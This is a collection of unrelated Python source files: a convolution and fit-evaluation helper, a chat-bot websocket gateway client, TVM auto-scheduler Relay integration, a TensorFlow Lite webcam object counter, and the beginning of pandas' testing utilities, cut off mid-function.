out[out_index] += scipy.signal.convolve(h[ind], x[ind, start:stop])[y_index]
return out
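# Hypothetical sketch (not part of the original module) of calling ``convolve``
# directly: a single-predictor three-tap kernel applied to a short signal, with
# zero padding and the kernel anchored at lag 0. Values are illustrative only.
def _demo_convolve():
    h = np.array([[0.5, 1.0, 0.25]])      # (n_stims, h_n_samples)
    x = np.arange(10, dtype=float)[None]  # (n_stims, n_samples)
    x_pads = np.zeros(1)                  # padding value per predictor
    return convolve(h, x, x_pads, h_i_start=0)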
def evaluate_kernel(y, y_pred, error, i_skip, segments=None):
"""Fit quality statistics
Parameters
----------
y : array, (n_samples)
Y.
y_pred : array, (n_samples)
Predicted Y.
error : str
Error metric.
i_skip : int
Skip this many samples for evaluating model fit.
segments : array (n_segments, 2)
Data segments.
Returns
-------
r : float | array
Pearson correlation.
rank_r : float | array
Spearman rank correlation.
error : float | array
Error corresponding to error_func.
"""
# discard onset
if i_skip:
assert segments is None, "Not implemented"
y = y[i_skip:]
y_pred = y_pred[i_skip:]
error_func = ERROR_FUNC[error]
index = np.array(((0, len(y)),), np.int64)
return (np.corrcoef(y, y_pred)[0, 1],
spearmanr(y, y_pred)[0],
error_func(y - y_pred, index))
|
websocket.py
|
from __future__ import annotations
import asyncio
import json
import sys
import threading
import time
import typing
import zlib
from copy import deepcopy
import aiohttp
from aiohttp.http_websocket import WSMessage, WSMsgType
if typing.TYPE_CHECKING:
from ..client import Client
class WebSocket:
# websocket opcodes
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
PRESENCE = 3
VOICE_STATE = 4
VOICE_PING = 5
RESUME = 6
RECONNECT = 7
REQUEST_MEMBERS = 8
INVALIDATE_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
GUILD_SYNC = 12
def __init__(self, client, token: str) -> None:
self.decompress = zlib.decompressobj()
self.buffer = bytearray()
self.client: Client = client
self.token = token
self.session_id = None
self.heartbeat_acked = True
async def start(
self,
url: typing.Optional[str] = None,
*,
reconnect: typing.Optional[bool] = False
):
if not url:
url = self.client.handler.gateway()
self.socket = await self.client.handler.connect(url)
await self.receive_events()
await self.identify()
if reconnect:
await self.resume()
else:
t = threading.Thread(target=self.keep_alive, daemon=True)
t.start()
return self
def keep_alive(self) -> None:
while True:
time.sleep(self.hb_int)
if not self.heartbeat_acked:
# We have a zombified connection
self.socket.close()
asyncio.run(self.start(reconnect=True))
else:
asyncio.run(self.heartbeat())
    def on_websocket_message(self, msg: typing.Union[bytes, str]) -> typing.Optional[str]:
        if type(msg) is bytes:
            # Append the raw payload to the buffer; compressed frames may arrive in chunks.
            self.buffer.extend(msg)
# check if last 4 bytes are ZLIB_SUFFIX
if len(msg) < 4 or msg[-4:] != b"\x00\x00\xff\xff":
return
msg = self.decompress.decompress(self.buffer)
msg = msg.decode("utf-8")
self.buffer = bytearray()
return msg
async def receive_events(self) -> None:
msg: WSMessage = await self.socket.receive()
# if the message is something we can handle
if msg.type is aiohttp.WSMsgType.TEXT or msg.type is aiohttp.WSMsgType.BINARY:
msg = self.on_websocket_message(msg.data)
# if it's a disconnection
elif msg.type in (
aiohttp.WSMsgType.CLOSE,
aiohttp.WSMsgType.CLOSING,
aiohttp.WSMsgType.CLOSED,
):
await self.socket.close()
raise ConnectionResetError(msg.extra)
msg = json.loads(msg)
op = msg["op"]
data = msg["d"]
sequence = msg["s"]
self.sequence = sequence
if op == self.HELLO:
self.hb_int = msg["d"]["heartbeat_interval"] // 1000
await self.heartbeat()
elif op == self.HEARTBEAT:
await self.heartbeat()
elif op == self.DISPATCH:
if msg["t"] == "READY":
self.session_id = msg["d"]["session_id"]
# send event to dispatch
await self.client.handle_event(msg)
async def heartbeat(self) -> None:
"""Send HB packet"""
payload = {"op": self.HEARTBEAT, "d": self.sequence}
await self.socket.send_json(payload)
async def identify(self) -> None:
"""Sends the IDENTIFY packet"""
payload = {
"op": self.IDENTIFY,
"d": {
"token": self.token,
"intents": self.client.intents.value,
"properties": {
"$os": sys.platform,
"$browser": "disthon",
"$device": "disthon",
},
"large_threshold": 250,
"compress": True,
},
}
await self.socket.send_json(payload)
async def resume(self) -> None:
"""Sends the RESUME packet."""
payload = {
"op": self.RESUME,
"d": {
"seq": self.sequence,
"session_id": self.session_id,
"token": self.token,
},
}
await self.socket.send_json(payload)
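# Hypothetical sketch (not part of the original module) of the transport
# compression handled in on_websocket_message: frames are buffered until the
# ZLIB suffix (00 00 ff ff) arrives, then fed through a shared decompressobj so
# the zlib stream state is preserved across messages. The payload is made up.
def _demo_zlib_stream():
    raw = json.dumps({"op": 11, "d": None}).encode("utf-8")
    compressor = zlib.compressobj()
    wire = compressor.compress(raw) + compressor.flush(zlib.Z_SYNC_FLUSH)
    assert wire[-4:] == b"\x00\x00\xff\xff"  # sync-flush marker used as suffix
    return zlib.decompressobj().decompress(wire).decode("utf-8")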
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import json
import logging
import threading
import tvm
from tvm import autotvm, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import Reduce
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG, LayoutRewriteOption
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .utils import get_const_tuple
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={
"relay.backend.use_auto_scheduler": True,
"relay.backend.disable_compile_engine_cache": True,
},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
try:
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
except tvm.TVMError:
print(
"Get errors with GraphRuntimeCodegen for task extraction. "
"Fallback to VMCompiler."
)
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
mod = tvm.IRModule.from_expr(mod) if isinstance(mod, relay.Function) else mod
compiler.lower(mod, target)
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# create search tasks
tasks = []
weights = []
for wkl_key, weight in env.wkl_key_to_weight.items():
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
target_host=target_host,
hardware_params=hardware_params,
# When auto scheduler is used in end to end network, try to apply layout rewrite
# to improve the overall performance
layout_rewrite_option=LayoutRewriteOption.get_target_default(target, True),
)
)
weights.append(weight)
return tasks, weights
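# Hypothetical usage sketch (not part of the upstream file): list the tuning
# tasks found in a Relay module. ``mod`` and ``params`` are placeholders for a
# real network; the target string is illustrative only.
def _demo_extract_tasks(mod, params, target="llvm"):
    tasks, task_weights = extract_tasks(mod, params, target)
    for task, weight in zip(tasks, task_weights):
        print(task.workload_key, "weight:", weight)
    return tasks, task_weights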
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_weight = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
"""
if workload_key not in self.wkl_key_to_weight:
self.wkl_key_to_weight[workload_key] = 0
self.wkl_key_to_weight[workload_key] += 1
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get input/output tensors and
other useful information.
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors with static shape
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
has_complex_op: bool
Whether the topi compute function includes at least one complex (reduce) op
"""
layout_free_ops = []
inputs = []
has_complex_op = False
visited = set()
def traverse(t):
nonlocal has_complex_op
# We cannot directly add tensors to the set, because the comparison of
# two tensors with ndim=0 is ambiguous.
assert t.handle is not None
if t.handle.value in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
has_complex_op = has_complex_op or any([isinstance(e, Reduce) for e in t.op.body])
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t.handle.value)
for t in outs:
traverse(t)
io_tensors = inputs + list(outs)
for tensor in io_tensors:
# Reject the compute if any of its I/O tensors has dynamic shape.
if any([not isinstance(v, int) for v in get_const_tuple(tensor.shape)]):
return ([], False, False)
return (io_tensors, len(layout_free_ops) > 0, has_complex_op)
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
None in the tracing mode so that the fallback topi schedule will be used.
"""
# pylint: disable=import-outside-toplevel
io_tensors, has_layout_free, has_complex_op = traverse_to_get_io_tensors(outs)
if not io_tensors: # The compute includes dynamic shapes which are not supported yet.
return None
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
target = tvm.target.Target.current()
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
return schedule
if env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
env.add_workload_key(key)
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if (
LayoutRewriteOption.get_target_default(target, True) != LayoutRewriteOption.NO_REWRITE
and has_layout_free
):
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return None
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
    Returns
    -------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
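# Illustrative sketch (not part of the original module): `is_auto_scheduler_enabled`
# reads the "relay.backend.use_auto_scheduler" option from the current PassContext.
# The helper below shows one way that option is typically switched on; the function
# name is hypothetical and only the config key comes from the code above.
def _example_enable_auto_scheduler():
    """Illustrative sketch: enable the flag checked by is_auto_scheduler_enabled."""
    with PassContext(opt_level=3, config={"relay.backend.use_auto_scheduler": True}):
        assert is_auto_scheduler_enabled()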
|
tflite_webcam.py
|
import os
import argparse
import cv2
import numpy as np
import sys
import time
from threading import Thread
import importlib.util
from datetime import datetime
import csv
class VideoStream:
"""Camera object that controls video streaming from the Picamera"""
def __init__(self, resolution=(640, 480)):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
        self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
        self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, resolution[0])
        self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument('--modeldir', help='Folder the .tflite file is located in',
required=True)
parser.add_argument('--graph', help='Name of the .tflite file, if different than detect.tflite',
default='detect.tflite')
parser.add_argument('--labels', help='Name of the labelmap file, if different than labelmap.txt',
default='labelmap.txt')
parser.add_argument('--threshold', help='Minimum confidence threshold for displaying detected objects',
default=0.5)
parser.add_argument('--resolution',
help='Desired webcam resolution in WxH. If the webcam does not support the resolution entered, errors may occur.',
default='1280x720')
parser.add_argument('--edgetpu', help='Use Coral Edge TPU Accelerator to speed up detection',
action='store_true')
parser.add_argument('--capture_threshold', help='Milliseconds between automatic sample captures',
                    default=3600000)
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
resW, resH = args.resolution.split('x')
imW, imH = int(resW), int(resH)
use_TPU = args.edgetpu
capture_threshold = int(args.capture_threshold)
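# Illustrative invocation (not part of the original script; the model directory
# name is hypothetical): only --modeldir is required, the remaining flags fall
# back to the defaults declared above.
#
#   python tflite_webcam.py --modeldir=Sample_TFLite_model --resolution=1280x720 --threshold=0.5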
# Import TensorFlow libraries
# If tflite_runtime is installed, import interpreter from tflite_runtime, else import from regular tensorflow
# If using Coral Edge TPU, import the load_delegate library
pkg = importlib.util.find_spec('tflite_runtime')
if pkg:
from tflite_runtime.interpreter import Interpreter
if use_TPU:
from tflite_runtime.interpreter import load_delegate
else:
from tensorflow.lite.python.interpreter import Interpreter
if use_TPU:
from tensorflow.lite.python.interpreter import load_delegate
# If using Edge TPU, assign filename for Edge TPU model
if use_TPU:
# If user has specified the name of the .tflite file, use that name, otherwise use default 'edgetpu.tflite'
if GRAPH_NAME == 'detect.tflite':
GRAPH_NAME = 'edgetpu.tflite'
# Get path to current working directory
CWD_PATH = os.getcwd()
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME, GRAPH_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH, MODEL_NAME, LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, 'r') as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == '???':
del (labels[0])
# Load the Tensorflow Lite model.
# If using Edge TPU, use special load_delegate argument
if use_TPU:
interpreter = Interpreter(model_path=PATH_TO_CKPT,
experimental_delegates=[load_delegate('libedgetpu.so.1.0')])
print(PATH_TO_CKPT)
else:
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
floating_model = (input_details[0]['dtype'] == np.float32)
input_mean = 127.5
input_std = 127.5
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW, imH)).start()
time.sleep(1)
def get_color(name):
if name == 'car':
return 10, 255, 0
elif name == 'person':
return 0, 10, 255
elif name == 'cycle':
return 255, 10, 0
return 0, 127, 255
tick = cv2.getTickCount()
out_file = open("out/%s.csv" % datetime.now().strftime('%Y%m%d-%H%M%S'), 'a')
def capture_samples(frame):
global tick
tick2 = cv2.getTickCount()
t = (tick2 - tick) / freq * 1000
if t > capture_threshold:
tick = tick2
capture(frame)
def capture(frame):
filename = "samples/frame-%s.jpg" % datetime.now().strftime('%Y%m%d-%H%M%S')
cv2.imwrite(filename, frame)
print(filename)
def write_data(file, object_name_list):
car = object_name_list['car']
person = object_name_list['person']
cycle = object_name_list['cycle']
writer = csv.writer(file, delimiter=',')
epoch = int(time.time() * 1000)
writer.writerow([epoch, car, person, cycle])
while True:
# Start timer (for calculating frame rate)
t1 = cv2.getTickCount()
# Grab frame from video stream
try:
frame1 = videostream.read()
except Exception as e:
out_file.flush()
out_file.close()
raise e
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (width, height))
input_data = np.expand_dims(frame_resized, axis=0)
# Press 'q' to quit
key = cv2.waitKey(1)
if key == ord('q'):
out_file.close()
break
elif key == ord('s'):
capture(frame)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]['index'])[0] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]['index'])[0] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]['index'])[0] # Confidence of detected objects
# num = interpreter.get_tensor(output_details[3]['index'])[0] # Total number of detected objects (inaccurate and not needed)
overlay = frame.copy()
object_name_list = {'car': 0, 'person': 0, 'cycle': 0}
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if (scores[i] > min_conf_threshold) and (scores[i] <= 1.0):
            object_name = labels[int(classes[i])]  # Look up object name from "labels" array using class index
            # Only count classes tracked in object_name_list; other labels would otherwise raise a KeyError
            if object_name in object_name_list:
                object_name_list[object_name] += 1
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * imH)))
xmin = int(max(1, (boxes[i][1] * imW)))
ymax = int(min(imH, (boxes[i][2] * imH)))
xmax = int(min(imW, (boxes[i][3] * imW)))
color = get_color(object_name)
cv2.rectangle(overlay, (xmin, ymin), (xmax, ymax), color, 2)
# Draw label
            label = '%d' % (int(scores[i] * 100))  # Example: '72' (confidence as a percentage)
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 1) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(overlay, (xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10), (255, 255, 255),
cv2.FILLED) # Draw white box to put label text in
cv2.putText(overlay, label, (xmin, label_ymin - 7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0),
2) # Draw label text
# All the results have been drawn on the frame, so it's time to display it.
alpha = 0.4
frame = cv2.addWeighted(overlay, alpha, frame, 1 - alpha, 0)
# Draw framerate in corner of frame
cv2.putText(frame, '{0:.2f} / {1:.0f}'.format(frame_rate_calc, 1.0 / frame_rate_calc * 1000), (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (52, 235, 52),
2,
cv2.LINE_AA)
cv2.putText(frame, 'car: %d' % object_name_list['car'], (30, 50 * 2), cv2.FONT_HERSHEY_SIMPLEX, 1, get_color('car'),
2,
cv2.LINE_AA)
cv2.putText(frame, 'person: %d' % object_name_list['person'], (30, 50 * 3), cv2.FONT_HERSHEY_SIMPLEX, 1,
get_color('person'),
2,
cv2.LINE_AA)
cv2.putText(frame, 'cycle: %d' % object_name_list['cycle'], (30, 50 * 4), cv2.FONT_HERSHEY_SIMPLEX, 1,
get_color('cycle'),
2,
cv2.LINE_AA)
cv2.imshow('Object detector', frame)
write_data(out_file, object_name_list)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2 - t1) / freq
frame_rate_calc = 1 / time1
# Clean up
cv2.destroyAllWindows()
videostream.stop()
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("always", _testing_mode_warnings)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
warnings.simplefilter("ignore", _testing_mode_warnings)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
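# Illustrative sketch (not part of the original module): round-tripping a small
# Series through pickle and asserting it is unchanged. The helper function name
# and the data are made up; round_trip_pickle and assert_series_equal are
# defined in this file.
def _example_round_trip_pickle():
    """Illustrative usage sketch of round_trip_pickle."""
    ser = Series([1, 2, 3], name="a")
    result = round_trip_pickle(ser)
    assert_series_equal(result, ser)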
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
f = gzip.open(path, "rb")
elif compression == "bz2":
f = bz2.BZ2File(path, "rb")
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
f = zip_file.open(zip_names.pop())
else:
